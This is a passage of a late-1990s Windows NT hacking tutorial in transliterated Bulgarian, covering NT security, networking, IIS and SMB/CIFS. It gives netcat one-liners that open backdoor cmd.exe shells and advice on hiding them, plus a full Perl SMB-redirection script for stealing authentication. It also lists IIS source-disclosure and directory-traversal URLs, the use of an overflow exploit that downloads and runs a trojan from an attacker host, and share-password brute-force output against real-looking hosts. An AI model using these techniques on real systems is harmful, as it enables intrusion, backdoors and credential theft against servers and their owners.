Posledniqt nachin e naj-udoben: produkta Cygwin na Cygnus (www.cygnus.org)
(maintainerite na gcc). Towa e gcc za win32, koeto idwa s pulen nabor header
i lib failowe. Sled kompiliraneto na UNIX programata s gcc za Windows, se
poluchawa normalno windows .exe, koeto izpolzwa edin DLL (cygwin.dll),
translirasht UNIX system callowete w callowe na Win32 API-to. Zaedno s gcc w
paketa sa wklucheni i portnati bash, grep, ls, i oshte mnogo standartni UNIX
utilitata. S pomoshta na Cygwin sa compilirani Windows versiite na NAT, John
The Ripper, Emacs i oshte mnogo drugi.
3) Standartna sistema za sigurnost
Modela za sigurnost na Windows NT e izgraden na bazata na klasicheskite UNIX
i VMS, s nqkoi dopulneniq. Wseki user ima swoi account i prinadlevi na
edna ili poweche user groupi. Za razlika ot UNIX, ogranicheniqta na dostupa
ne sa na niwo failowe, a na niwo obekti. Obekt w Windows NT se naricha wseki
edin resourse, naprimer fail, pamet, process, ustroystwo. Wseki obect ima
t.n. Access Control List (ACL), koito predstawlqwa spisuk ot prawa za
dostup. Tuk designerite na NT sa wzeli za primer ne UNIX (koito ima samo 3
wida prawa - za owner, group i others), a operacionnata sistema VMS. Pri
nego mogat da se zadawat neogranichen broi prawa za razlichni groupi.
Naprimer na edin file mogat da budata zadadeni slednite prawa:
Administrators - Full Control
Office Users - Change
Power Users - Change
Guests - Read
Tech Support - Full Control
Access mode-tata zawisqt ot tipa na resoursa. Osnowno sa 4 wida: No Access,
Read, Change i Full Access. Pri failowete mogat da se zadawat i
dopulnitelni widowe dostup - prawata za Read, Write, Execute, Delete i Take
Ownership mogat da budat wkluchwani ili izkluchwani poedinichno.
Tazi sistema za prawa na dostup opredeleno e po-guwkawa ot standartnata (w
UNIX sweta). No wupreki che pozwolqwa na administratora da nastroiwa dosta
specifichni widowe dostup, tq ima i edin golqm nedostatuk: chesto
nachinaeshtite administratori ne uspqwat da nastroqt prawilno ACL-ite na
razlichni wavni failowe i towa dowevda do tevi (za tqh) posledstwiq. Kato
edin primer shte dam problemite na Lotus Notes, koito pri neprawilno
nastroiwane na ACL-ite pozwolqwa da se izwurshwa remote administraciq na
server bez kakwato i da e authentikaciq.
4) TCP/IP Networking & Security
Windows NT ima dobra poddruvka na TCP/IP, wupreki che za po-interesnite
neshta e neobhodimo da se polzwat programi ot drugi proizwoditeli.
Standartno sa wklucheni komandite ping, traceroute, telnet, ftp, arp, route
i nslookup, no nqkoi ot tqh (osobeno telnet-a) sa malko sakati.
Sushtestwuwa wuzmovnost za ip routing i nqkakwa minimalna poddruvka na
firwall. Mogat da budat izbrani koi TCP portowe, UDP portowe i IP protokoli
da budat propuskani prez machinata i koi ne.
Standartno s Windows NT wurwqt t.n. Simple TCP Services. Po default sa
disablenati, no sled puskaneto im se proqwqwat echo, discard, chargen i
qoute of the day. Za suvalenie nqma nikakuw nachin da budat pusnati samo
nqkoi ot tqh - naprimer samo echo i chargen. Trqbwa da se pusne ili wsichko,
ili nishto.
Za po advanced TCP networking se nuvdaete ot dopulnitelni programi.
Sushtestwuwa telnet daemon za NT, koito pri connect puska standarten dos
shell. Wuperki che ideqta e dobra, nqma golqma polza - Windows NT
prakticheski ne move da se polzwa ili administrira prez komanden red.
Ima port na TCPDump za Windows (NT i 95), koito wurwi suwsem prilichno.
Soursut mu se razprostranqwa free.
Ima IP Masqarading za NT. Naricha se NAT32 i adresa mu e www.nat32.com Ot
tam movete da salite evaluation versiq, chieto edinstweno ogranichenie e che
raboti ne poweche ot edin chas (sled tozi chas trqbwa da zatworite
programata i da q pusnete pak za oshte). Programata e mnogo dobra i se
nastoriwa prez neshto kato comanden red, mnogo prilichasht na unix.
Nikoga ne mi e bilo qsno zashto tolkowa mnogo Internet clubowe izpolzwat
razni shibani Proxy software-i (kato WinGate ili WinProxy), koito sa adski
bugawi i pulni s exploiti, sled kato ima IP Masqarading dori za Windows. No
towa si e tehen problem. Edin burz urok po abuse na podoben proxy software -
chesto raznite proxyta priemat connect ot wsqkude bez ogranicheniq. Naprimer
movete da se telnetnete na wingate.host.com i na primpta da napishete:
WinGate>some.host.com 23
i proxyto shte wi otwori telnet do some.host.com. Bonus: obiknoweno proxyto
nqma logowe :-)
Edna interesna programa e Netcat. Tq pozwolqwa connectwane i transfer na raw
danni na wsichki portowe. Dopulnitelni finkcii sa zadawaneto na
source-route, portscan, hex-dump na trafica, zadawane na source porta i UDP
revim. Move bi naj-poleznoto e wuzmovnosta za redirectwane na whoda i
izhoda, koeto ulesnqwa mnogo testwane na mrevowi protocoli, durpane na http
headeri i t.n. Sushto taka move da slusha na daden port, kato pri
connectwane da puska programa, redirectwajki whoda i izhoda prez TCP
connectiata.
Netcat e mnogo polezen za instalirane na backdoor, puskasht comandniq prompt
na NT pri conectwane kum nego.
nc -L -p 23 -t -d -e cmd.exe Slusha na port 23 i puska shell pri connect.
Windows NT pozwolqwa na wseki user da bind-ne wseki port. Towa oznachawa che
dori da ne ste administrator, movete da pusnete netcat da slusha na port 53
i da probiete firewall-a.
Sushto taka movete da bindnete port, koito weche e bindnat, kato zadadete
tochniq IP adres na machinata (ili na edin ot interfeisite i). Towa e edin
interesen Denial Of Service.
nc -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx
kudeto xxx.xxx.xxx.xxx e IP adresa na NT-to, pozwolqwa da se connectwate na
port 139 i da poluchite shell. Towa sushto taka blokira NetBIOS protokola,
chrez koito se realizira file & printer sharing-a. Ako skriete dostatuchno
dobre Netcat-a i se pogrivite da se puska awtomatichno, administratora shte
se izmuchi dosta dokato razbere zashto file sharinga ne raboti.
Tozi problem (s bind-waneto na privilegirowani portowe, koito weche sa
bind-nati ot druga programa) pozwolqwa oshte edin interesen exploit. Towa
e perl script, koito redirectwa celiq SMB trafic (file sharing, printer
sharing, authentikaciq) kum drug server. Ot tam weche movete da podprawqte
authentikaciqta, da kradete paroli, etc.
-- CUT: smb-redir.pl -------------------------------------------------------
#!/usr/bin/perl
# This script demonstrates a major security problem with
# Windows NT4. It is based on an earlier script (paul.pl) that
# demonstrated a problem with a protocol change that Microsoft
# proposed. The change in this script takes advantage of a security
# hole pointed out by L0pht (http://www.l0pht.com/).
# What this script does is allow any unprivileged user on a NT Server
# to redirect the local SMB services to any other SMB server which they
# have an IP address for. This allows the user to redirect file,
# printer and authentication services to another server. This has
# enormous consequences for security.
# This script was written by Andrew Tridgell and is being sent to
# the CIFS discussion list so that CIFS developers become aware
# of this problem. It should be noted that the L0pht announcement
# (which predates this script) already provided an example command
# using netcat to achieve the same thing so this script does
# not actually offer malicious hackers anything more than what has
# already been widely distributed. I wrote this example so that
# the consequences would become clear to the people who are
# in a position to do something about fixing the problem.
# USAGE:
# To use this script install perl5 then run the command
# perl redirect.pl <localip> <remoteip>
# for example
# perl redirect.pl 192.168.2.13 192.168.2.10
# this would redirect any SMB connections made to the local
# server (whose IP address is 192.168.2.13) to the remote
# server 192.168.2.10. Any browsing, file access, authentication
# requests or printing done to the local server by SMB clients
# will be redirected to the remote server.
# WORKAROUND:
# There is no immediate fix to this security problem yet available. A
# workaround is to disable local login access to non-trusted users.
# This can be achieved using the "User Manager For Domains". At many
# sites this will be an acceptable solution because NT servers are
# often used only for remote file and printer services and do not
# really need to offer the ability for users to run arbitrary programs
# FIX:
# A proper fix will require a patch from Microsoft. Hopefully they will
# either implement privileged ports or they will get the socket
# options correct on all their servers so such bind() tricks are
# not possible.
use IO::Socket;
use IO::Select;
if ($#ARGV != 1) {
print "Usage: redirect.pl <localip> <remoteip>\n";
exit 0;
}
my $local = $ARGV[0];
my $target = $ARGV[1];
my $smbport = "139";
my $Msg;
# this is a *SMBSERVER netbios name
my $netbname = "CKFDENECFDEFFCFGEFFCCACACACACACA";
print "setting up redirection from $local to $target ...\n";
# Create a local socket
$sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,
Proto=>'tcp',Listen=>5,Reuse=>1);
while (1) {
print "listening on $local\n";
# Accept a connection
$IS = $sock1->accept() || die;
# Open a socket to the remote host
$OS = new IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,
Proto=>'tcp') || die;
print "connected to $target\n";
# Create a read set for select()
$rs = new IO::Select();
$rs->add($IS,$OS);
$first = 1;
$finished = 0;
while(! $finished) {
($r_ready) = IO::Select->select($rs,undef,undef,undef);
foreach $i (@$r_ready) {
$o = $OS if $i == $IS;
$o = $IS if $i == $OS;
recv($i,$Msg,8192,0);
if (! length $Msg) {
$finished = 1;
break;
}
if ($first && substr($Msg,0,1) eq "\x81") {
print "replacing called name\n";
$msg2 = join('',substr($Msg,0,5),$netbname,
substr($Msg,37,length($Msg)-37));
send($o,$msg2,0);
$first = 0;
}
else {
if ($i == $OS) { $Msg =~ s/Paul/Oops/mg;}
send($o,$Msg,0);
}
}
}
# loop back to the top again
}
-- CUT: smb-redir.pl -------------------------------------------------------
5) IIS
IIS e http i ftp server, standartno instaliran s Windows NT. Kato cqlo ima
nqkoi interesnin funkcii, no za suvalenie (ili za radost) e pulen sus
problemi sus sigurnosta. Wsichko (pochti) neobhodimo za prewrushtaneto na
IIS e siguren server movete da namerite na:
http://www.microsoft.com/security/products/iis/CheckList.asp
Sled kato widite kolko mnogo neshta trqbwa da se prawqt (sledowatelno po
default ne sa sigurni), shte razberete zashto IIS gubqt pred Apache.
5.1) IIS 3.0
5.1.1) Wivdane na sourse na .asp script
IIS poddurva t.n. Active Server Pages s razshirenie .asp, koito
predstawlqwat server-side scriptowe, napisani na VBScript. IIS ima
mnogobroini bugowe, s koito movete da widite soursa na scripta. Ot tam weche
movete da widite absolutni putishta kum dokumentite, imena na failowe s
paroli i t.n.
Dobawqneto na tochka sled imeto na scripta pokazwa soursa mu:
http://www.victim.com/script.asp.
Tezi url-ta rabotqt i za serveri, koito imat patch za tochkata (%2e e hex
coda na ASCII simwola ".")
http://www.someserver.com/default%2easp
http://www.someserver.com/default%2e%41sp
shtml.dll e component na IIS, pokazwasht failowe sus Server-Side-Includes
(obiknoweno s razshirenie .shtml). Toi move da se pokave soursa na ASP file:
http://www.someserver.com/shtml.dll?default.asp
Interesna funkciq na NTFS (failowata sistema na NT) e towa, che tq poddruva
razlichni widowe streamowe, asociirani sus wseki file. Te se zadawat s
dobawqne na ::$ i imeto na streama sled imeto na faila pri suzdawaneto ili
otwarqneto mu. Towa pozwolqwa nalichieto na nqkolko razlichi sudurvaniq na
edin i susht file. Naprimer move da imame programa, zapazwashta informaciq
wuw file, koqto izpolzwa streama $ENG za angliiski ezik, a $BG za bulgarski.
Ako sled towa otworim fila w Notepad taka: filename.txt::$ENG shte otworim
angliiskata wersiq, a s filename.txt::$BG shte poluchim bulgarskata. Default
streama s dannite na file se naricha $DATA. Towa oznachawa che filename.txt
e ekwawilentno na filename.txt::$DATA. Pri podawane na takowa url kum
servera IIS pokazwa soursa na asp faila, bez da go izpulnqwa.
http://www.someserver.com/default.asp::$DATA
5.1.2) Index Server
Drug interesen nachin za izdurpwane na informaciq za NT servera prez IIS e
Index Server, koito e instaliran w direktoriqta /samples na IIS 3.0 Chesto
administratorite imat problemi s nastroikata mu i towa wodi do namirane na
neshta, koito ne bi trqbwalo da se namirat. Url-to za dostup do Index
Servera e http://www.someserver.com/samples/search/queryhit.htm Ako
poluchite suobshtenie za nesushtestwuwashta stranica, natisnete butona
"Search This Site", koito sushto shte wi prati kum Index Servera. Sled towa
izpolzwajte search stringa #filename=*.txt Towa shte nameri wsichki .txt
failowe, koito Index Servera e indexiral. Imajte predwid che Index Servera
pokazwa samo tezi failowe, do koito imate dostup, taka che ako nqkoi file e
pokazan move da ste sigurni che movete da go prochetete. Ako Index Servera e
greshno konfiguriran, movete da tursite #filename=*._ za da namerite repair
kopieto na SAM databasata (ot nego movete da izwadite parolite na userite i
administratora)
5.2) IIS 4.0
5.2.1) Wivdane na istinskoto IP na servera
Problemite pri IIS 4.0 sushto sa mnogobroini. Edin naskoro izlqzul bug e
towa, che wuw wrushtanite headeri ot servera winagi se pokazwa istinskoto
mu IP. Towa move da e problem, ako servera e zad proxy ili firewall, koito
_bi_trqbwalo_ da skriwat IP-to mu. Ne e neshto seriozno, no ponqkoga e
polezno.
$ telnet www.victim.com 80
Trying xxx.xxx.xxx.xxx
Connected to www.victim.com
Escape character is '^]'.
GET / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://192.168.10.15/index.html
...
W headera Content-Location se namira IP-to na servera.
5.2.2) Source na .asp scriptowe
Drug bug, pozwolqwasht da se widi soursa na .asp failowete otnowo se namira
w primernite scriptowe, koito po default se instalirat s IIS. Scripta
showcode.asp sluvi za pokazwane na source na primernite failowe w
direktoriqta /msadc. Zashtita mu se sustoi w towa da prowerqwa dali target
faila se namira w tazi direktoriq. No problemut e che ne se prowerqwa za ../
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/SELECTOR/showcode.asp
Towa e normalno url, demonstrirashto dejstwieto na scripta showcode.asp.
Sledwashtoto url izpolzwa trika s dwete tochki za da izleze w glavnata
direktoriq na servera i da pokave sudurvanieto na boot.ini faila (towa e
configuracionen file za bootwaneto na Windows-a)
http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/../../../../../boot.ini
5.2.3) Remote password brute-force
S pomoshtta na IIS hakerut move da brute-forcewa paroli na remote serveri.
Pri default instalaciqta http://www.victim.com/iisadmpwd sudurva .htr
scriptowe, koito pozwolqwat na usera da si smenq parolata prez web.
Failowete w direktoriqta sa slednite:
achg.htr
aexp.htr
aexp2.htr
aexp2b.htr
aexp3.htr
aexp4.htr
aexp4b.htr
anot.htr
anot3.htr
Wsichki te pozwolqwat smqna na parolata, s url ot wida:
http://www.victim.com/iisadmpwd/achg.htr
Pri towa trqbwa da se napishe segashnata parola, a ako tq e greshna scripta
wrushta greshka.
Lesno move da bude napisan script, koito brute-forcwa parola na daden user.
Username move da bude wzet po mnogo nachini - chrez NetBIOS, VRFY comanda na
SMTP i po drugi nachini.
Ako wmestno username napisheste IPADDRESS\USERNAME (razdeleni s naklonena
cherta), web servera shte se connectne kum machinata s IPADRESS-a na port
139 i ottam shte se opita da smeni parolata na _remote_machinata_ Towa move
da se izpolzwa za remote brute-force ili za probiwane na firewall-i.
5.2.4) Absoluten path kum virtualnite direktorii
Ako servera e konfiguriran da poddurva perl chrez perl.exe, towa move da se
izpolzwa za namirane na abosultniq path kum web direktoriqta.
http://www.victim.com/scripts/no-such-file.pl
wrushta greshka kato:
CGI Error
The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:
Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
directory
Towa oznachawa, che direktoriqta, w koqto e instaliram IIS, e C:\InetPub
5.2.5) Administraciq na servera prez web
IIS predostawq na administratorite sredstwo za remote administraciq na NT
serveri prez web. Towa stawa chrez url-to http://www.victim.com/iisadmin
koeto pozwolqwa da se izwurshwat razlichni administratiwni dejnosti.
Pri neprawilno konfigurirane e wuzmovno da se poluchi anonymous access do
tazi direktoria, koeto e losho za sigurnosta :-)
5.2.6) Remote IIS buffer overflow
Tuk stigame do naj-interesnata chast - remote buffer overflows. Naskoro
beshe otkrit buffer overflow, koito sushtestwuwa w SP3, SP4 i SP5 i
pozwolqwa izpulnenie na wunshen kod na servera. Koda se izpulnqwa kato
ssytem process, koeto mu dawa administratorski prawa. Tozi buffer overflow
se namira w ISAPI filtera za .htr failwete. Pri podawane na GET request za
.htr file s mnogo dulgo ime, buffera se verflowa i koda se izpulnqwa. Nqma
nishto slovno w samiq exploit. eEye (awtorite na exploita) sa napisali
programata iishack.asm, koqto exploitwa tozi buffer overflow. Syntaxisa e
sledniq:
iishack www.victim.com 80 www.myserver.com/trojan.exe
www.victim.com e servera, koito se exploitwa, 80 e porta na koito wurwi
web-a, a www.myserver.com/trojan.exe e URL-to na trojaneca, koito trqbwa
da se izpulni. Sled overflowaneto na servera, nashiqt code izteglq ot
internet trojan.exe i go puska. Obiknoweno se izpolzwa ncx.exe ili ncx99.exe
Towa sa modificirani versii na netcat, koito slushat na port 80 ili 99 i pri
connect puskat shell (cmd.exe). Po dobre e da se izpolzwa ncx99.exe,
zashtoto inache ima probelmi sus umirashtiq IIS server (koito sushto slusha
na port 80). ncx.exe e dobre da se izpolzwa samo ako ima firewall,
blokirasht port 99.
6) CIFS
CIFS e sukrashtenie na Common Internet File System. Towa e standart za
remote dostup do failowe i printeri, basiran na standarta na Microsoftskite
mrevi (sreshtan oshte pod imenata SMB i NetBIOS). Sushtestwuwat mnogo
nachini za pronikwane w edin NT server prez CIFS.
6.1) nbtstat
Wsqka machina, poddurvashta CIFS ima sobsteno ime, priswoqwano ot
administratora. Sushtestwuwat razlichni mehanizmi za poddruvka na tezi imena
w LAN-a (broadcast, WINS severi), no naj-chesto machinite poluchawat status
query-ta na port 137 UDP i im otrgowarqt, dawajki imeto si.
Towa stawa s komandata:
nbtstat -A www.bnb.bg
Name Type Status
---------------------------------------------
WEBSRV <00> UNIQUE Registered
BNBANK.ORG <00> GROUP Registered
WEBSRV <03> UNIQUE Registered
WEBSRV <20> UNIQUE Registered
BNBANK.ORG <1E> GROUP Registered
BNBANK.ORG <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-04-AC-86-5C-FB
Purwata kolonka sa imenata na machinata, w skobi e tipa na imeto. Ima dwa
wida imena - UNIQUE i GROUP. UNIQUE oznachawa, che towa e ime samo na
machinata, a GROUP e ime na groupa, kudeto machinata prinadlevi.Tipowete w
skobite ni dawat mnogo informaciq za servera. Eto kakwo znachat osnownite:
0x00 ime na machinata i na workgroupa/domaina. Naprimer ot gornite
rezultati za www.bnb.bg wivdame, che imeto na machinata e WEBSRV, a
groupata/domaina e BNBANK.ORG
0x01 ako sushteswuwa ime s takuw tip, towa oznachawa, che server e master
browser za localnata si mreva. Toi subira informaciq za susednite
si machini (naprimer IP adresite im). Tazi informaciq move da bude
izdurpana.
0x03 messaging/alerter service, obiknoweno sus sushtoto ime kato imeto na
machinata. Ako ima dwe imena ot takuw tip, wtoroto e ime na user,
koito se e lognal na servera.
0x20 towa e "server service" name, pod koeto machinata predostawq dostup
do filowowata si sistema i printera. Ako w rezultata na nbtstat nqma
ime s tip 0x20, znachi server ne e konfiguriran sa share-wa nikakwi
resoursi.
0x1B server s takowa ime e master-browser na domaina
0x1C server prinadlevi na groupata na domain controllerite
Ima oshte mnogo tipowe imena. Eto edin po-pulen spisuk:
Name Number Type Usage
=========================================================================
<computername> 00 U Workstation Service
<computername> 01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
<computername> 03 U Messenger Service
<computername> 06 U RAS Server Service
<computername> 1F U NetDDE Service
<computername> 20 U File Server Service
<computername> 21 U RAS Client Service
<computername> 22 U Exchange Interchange
<computername> 23 U Exchange Store
<computername> 24 U Exchange Directory
<computername> 30 U Modem Sharing Server Service
<computername> 31 U Modem Sharing Client Service
<computername> 43 U SMS Client Remote Control
<computername> 44 U SMS Admin Remote ControlTool
<computername> 45 U SMS Client Remote Chat
<computername> 46 U SMS Client Remote Transfer
<computername> 4C U DEC Pathworks TCPIP Service
<computername> 52 U DEC Pathworks TCPIP Service
<computername> 87 U Exchange MTA
<computername> 6A U Exchange IMC
<computername> BE U Network Monitor Agent
<computername> BF U Network Monitor Apps
<username> 03 U Messenger Service
<domain> 00 G Domain Name
<domain> 1B U Domain Master Browser
<domain> 1C G Domain Controllers
<domain> 1D U Master Browser
<domain> 1E G Browser Service Elections
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
<computername> 2B U Lotus Notes Server
IRISMULTICAST 2F G Lotus Notes
IRISNAMESERVER 33 G Lotus Notes
Forte_$ND800ZA 20 U DCA Irmalan Gateway Service
Chesto prissutwieto ili otsustwieto na edno ime move da se swurve s
prisustwie ili lipsa na daden software ili konfiguraciq na servera.
Naprimer wsichki NT-ta s IIS imat tezi dwe imena:
<INet~Services> 1C G Internet Information Server
<IS~Computer_name> 00 U Internet Information Server
Servera na www.bnb.bg nqma tezi imena, koeto ni nawevda na misulta, che nqma
i IIS (towa e wqrno, toi e s Lotus Domino web server)
Eto edin primer za subirane na informaciq za servera prez nbtstat. Kakwo
movem da nauchim ot tezi resultati?
Name Type Status
-------------------------------------------
NSZGATE <03> UNIQUE
INet~Services <1C> GROUP <- Servera ima IIS
IS~NSZGATE.....<00> UNIQUE <- Servera ima IIS
NSZGATE <00> UNIQUE <- Imeto na computera e NSZGATE
NSZ_DOMAIN <00> GROUP <- Toi prinadlevi na domain s ime NSZ_DOMAIN
NSZGATE <20> UNIQUE <- Server ima resource sharing
NSZGATE <6A> UNIQUE <- Server ima Exchange
NSZGATE <87> UNIQUE <- Server ima Exchange
6.1) Port 139 & resource sharing
Sled subirane na informaciq za servera prez 137 UDP port, e wreme za connect
na 139 port. Towa e porta za komandi i danni na CIFS protokola. Za dostup do
sharenatite resoursi na servera move da se izpolzwa standartnata NET comanda
w Widnows.
c:\work>net view \\192.168.0.42
Shared resources at \\192.168.0.42
Share name Type Used as Comment
----------------------------------------------------
C Disk WinNT
CDROM Disk
D Disk Development
E Disk Dos
F Disk Temp
G Disk Games
I Disk Win98
IBM40375 Print IBM 4037 5E
The command completed successfully.
Towa sa sharowete na servera. Ima nqkolko sharenati harddiska, cdrom i
printer. W sluchaq sharowete sa s imenata na hardowete, no imenata mogat da
budat kakwito administratora si poiska.
Ako nqkoi ot tezi sharowe sa bez parola, mogat da budat mountnati s
komandata NET USE. Sledwashtata komanda mountwa C share kato x: wuw
failowata sistema.
c:\work>net use x: \\192.168.0.42\C
Ako znaete ime i parola za shareto, movete da gi zadadete taka:
c:\work>net use x: \\192.168.0.42\C password /USER:username
Sled uspeshno mountwane, movete da napishete
c:\work>x:
x:\>dir
i weche imate dostup do remote diska.
Za awtomatizirane na operaciite po izpolzwane na sharenati resoursi se
izpolzwa programata NAT. Oswen za sharowe bez poarola, tq move da sluvi i
za brute-force na username i password za share.
c:\work>nat -o scan.log 212.116.129.124
[*]--- Checking host: 212.116.129.124
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Thu Jul 13 07:28:32 1999
[*]--- Timezone is UTC+1.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `' Password: `GUEST'
[*]--- Attempting to connect with Username: `' Password: `ROOT'
[*]--- Attempting to connect with Username: `' Password: `ADMIN'
[*]--- Attempting to connect with Username: `' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `' Password: `TEMP'
[*]--- Attempting to connect with Username: `' Password: `SHARE'
[*]--- Attempting to connect with Username: `' Password: `WRITE'
[*]--- Attempting to connect with Username: `' Password: `FULL'
[*]--- Attempting to connect with Username: `' Password: `BOTH'
[*]--- Attempting to connect with Username: `' Password: `READ'
[*]--- Attempting to connect with Username: `' Password: `FILES'
[*]--- Attempting to connect with Username: `' Password: `DEMO'
[*]--- Attempting to connect with Username: `' Password: `TEST'
[*]--- Attempting to connect with Username: `' Password: `ACCESS'
[*]--- Attempting to connect with Username: `' Password: `USER'
[*]--- Attempting to connect with Username: `' Password: `BACKUP'
[*]--- Attempting to connect with Username: `' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `' Password: `SERVER'
[*]--- Attempting to connect with Username: `' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `WRITE'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FULL'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BOTH'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `READ'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `FILES'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `DEMO'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `TEST'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `USER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SERVER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `LOCAL'
[*]--- Attempting to connect with Username: `GUEST' Password: `'
[*]--- Attempting to connect with Username: `GUEST' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `GUEST' Password: `GUEST'
[*]--- Attempting to connect with Username: `GUEST' Password: `ROOT'
[*]--- Attempting to connect with Username: `GUEST' Password: `ADMIN'
[*]--- Attempting to connect with Username: `GUEST' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `GUEST' Password: `TEMP'
[*]--- Attempting to connect with Username: `GUEST' Password: `SHARE'
[*]--- Attempting to connect with Username: `GUEST' Password: `WRITE'
[*]--- Attempting to connect with Username: `GUEST' Password: `FULL'
[*]--- Attempting to connect with Username: `GUEST' Password: `BOTH'
[*]--- Attempting to connect with Username: `GUEST' Password: `READ'
[*]--- Attempting to connect with Username: `GUEST' Password: `FILES'
[*]--- Attempting to connect with Username: `GUEST' Password: `DEMO'
[*]--- Attempting to connect with Username: `GUEST' Password: `TEST'
[*]--- Attempting to connect with Username: `GUEST' Password: `ACCESS'
[*]--- Attempting to connect with Username: `GUEST' Password: `USER'
[*]--- Attempting to connect with Username: `GUEST' Password: `BACKUP'
[*]--- Attempting to connect with Username: `GUEST' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `GUEST' Password: `SERVER'
[*]--- Attempting to connect with Username: `GUEST' Password: `LOCAL'
[*]--- Attempting to connect with Username: `BACKUP' Password: `'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `BACKUP' Password: `GUEST'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ROOT'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ADMIN'
[*]--- Attempting to connect with Username: `BACKUP' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `BACKUP' Password: `TEMP'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SHARE'
[*]--- Attempting to connect with Username: `BACKUP' Password: `WRITE'
[*]--- Attempting to connect with Username: `BACKUP' Password: `FULL'
[*]--- Attempting to connect with Username: `BACKUP' Password: `BOTH'
[*]--- Attempting to connect with Username: `BACKUP' Password: `READ'
[*]--- Attempting to connect with Username: `BACKUP' Password: `FILES'
[*]--- Attempting to connect with Username: `BACKUP' Password: `DEMO'
[*]--- Attempting to connect with Username: `BACKUP' Password: `TEST'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ACCESS'
[*]--- Attempting to connect with Username: `BACKUP' Password: `USER'
[*]--- Attempting to connect with Username: `BACKUP' Password: `BACKUP'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SERVER'
[*]--- Attempting to connect with Username: `BACKUP' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ROOT' Password: `'
[*]--- Attempting to connect with Username: `ROOT' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ROOT' Password: `GUEST'
[*]--- Attempting to connect with Username: `ROOT' Password: `ROOT'
[*]--- Attempting to connect with Username: `ROOT' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ROOT' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ROOT' Password: `TEMP'
[*]--- Attempting to connect with Username: `ROOT' Password: `SHARE'
[*]--- Attempting to connect with Username: `ROOT' Password: `WRITE'
[*]--- Attempting to connect with Username: `ROOT' Password: `FULL'
[*]--- Attempting to connect with Username: `ROOT' Password: `BOTH'
[*]--- Attempting to connect with Username: `ROOT' Password: `READ'
[*]--- Attempting to connect with Username: `ROOT' Password: `FILES'
[*]--- Attempting to connect with Username: `ROOT' Password: `DEMO'
[*]--- Attempting to connect with Username: `ROOT' Password: `TEST'
[*]--- Attempting to connect with Username: `ROOT' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ROOT' Password: `USER'
[*]--- Attempting to connect with Username: `ROOT' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ROOT' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ROOT' Password: `SERVER'
[*]--- Attempting to connect with Username: `ROOT' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ADMIN' Password: `'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMIN' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ROOT'
